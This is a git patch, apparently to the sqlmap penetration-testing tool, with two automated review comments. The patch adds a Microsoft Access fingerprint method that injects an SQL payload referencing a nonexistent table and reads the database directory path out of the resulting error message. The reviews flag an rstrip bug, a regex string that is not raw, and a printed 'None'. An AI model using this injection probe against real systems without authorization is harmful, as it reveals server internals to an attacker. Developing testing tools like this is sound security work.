From 6ad8bbfc8e5559c43cb9c558acb45b85ee6799c9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 2 Nov 2010 10:50:57 +0000
Subject: [PATCH] one more ms access update
---
 plugins/dbms/access/fingerprint.py | 32 ++++++++++++++++++++++++++++--
 1 file changed, 30 insertions(+), 2 deletions(-)
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 1e7ab3a3e..0f959dc0e 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -14,6 +14,8 @@ from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
 from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.common import wasLastRequestError
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -42,13 +44,13 @@ class Fingerprint(GenericFingerprint):
 payload = agent.payload(newValue=query)
 result = Request.queryPage(payload)
 retVal = "not sandboxed" if result else "sandboxed"
-
+
 return retVal
 def __sysTablesCheck(self):
 infoMsg = "executing system table(s) existance fingerprint"
 logger.info(infoMsg)
-
+
 # Microsoft Access table reference updated on 01/2010
 sysTables = {
 "97": ("MSysModules2", "MSysAccessObjects"),
@@ -83,6 +85,30 @@ class Fingerprint(GenericFingerprint):
 return None
+ def __getDatabaseDir(self):
+ retVal = None
+
+ infoMsg = "searching for database directory"
+ logger.info(infoMsg)
+
+ randInt = randomInt()
+ randStr = randomStr()
+ query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
+ query = agent.postfixQuery(query)
+ payload = agent.payload(newValue=query)
+ page = Request.queryPage(payload, content=True)
+
+ if wasLastRequestError():
+ match = re.search("Could not find file\s+'([^']+?)'", page[0])
+
+ if match:
+ retVal = match.group(1).rstrip("%s.mdb" % randStr)
+
+ if retVal.endswith('\\'):
+ retVal = retVal[:-1]
+
+ return retVal
+
 def getFingerprint(self):
 value = ""
 wsOsFp = formatFingerprint("web server", kb.headersFp)
@@ -120,6 +146,8 @@ class Fingerprint(GenericFingerprint):
 if htmlErrorFp:
 value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
+ value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
+
 return value
 def checkDbms(self):
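Review bot: `match.group(1).rstrip("%s.mdb" % randStr)` in the new `__getDatabaseDir` strips a set of characters rather than a suffix, so the result is only correct while a backslash separates the directory from the random file name; without one, trailing directory characters that also occur in the random name or in `.mdb` would be trimmed as well. Remove the suffix explicitly instead: `suffix = "%s.mdb" % randStr` followed by `if retVal.endswith(suffix): retVal = retVal[:-len(suffix)]`. The pattern should be a raw string, `r"Could not find file\s+'([^']+?)'"`, and `page[0]` reaches `re.search` without a check that a body was actually returned. No `import re` is visible in the import hunk, so confirm it exists earlier in the file. A one-line docstring saying the method returns None unless the server echoes the Jet "Could not find file" error would document its dependence on verbose error pages.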
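Review bot: The added `value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()` in `getFingerprint` prints the literal `'None'` whenever the lookup fails, because `__getDatabaseDir` returns None when the request is not an error or the message does not match. Append the line only when a directory was found: `dbDir = self.__getDatabaseDir()` and then `if dbDir: value += "\ndatabase directory: '%s'" % dbDir`. The call also adds one deliberately failing request to every fingerprint that reaches this point, which deserves a short comment since it will presumably appear in the server's error logs. getFingerprint's body starts and ends outside the hunk.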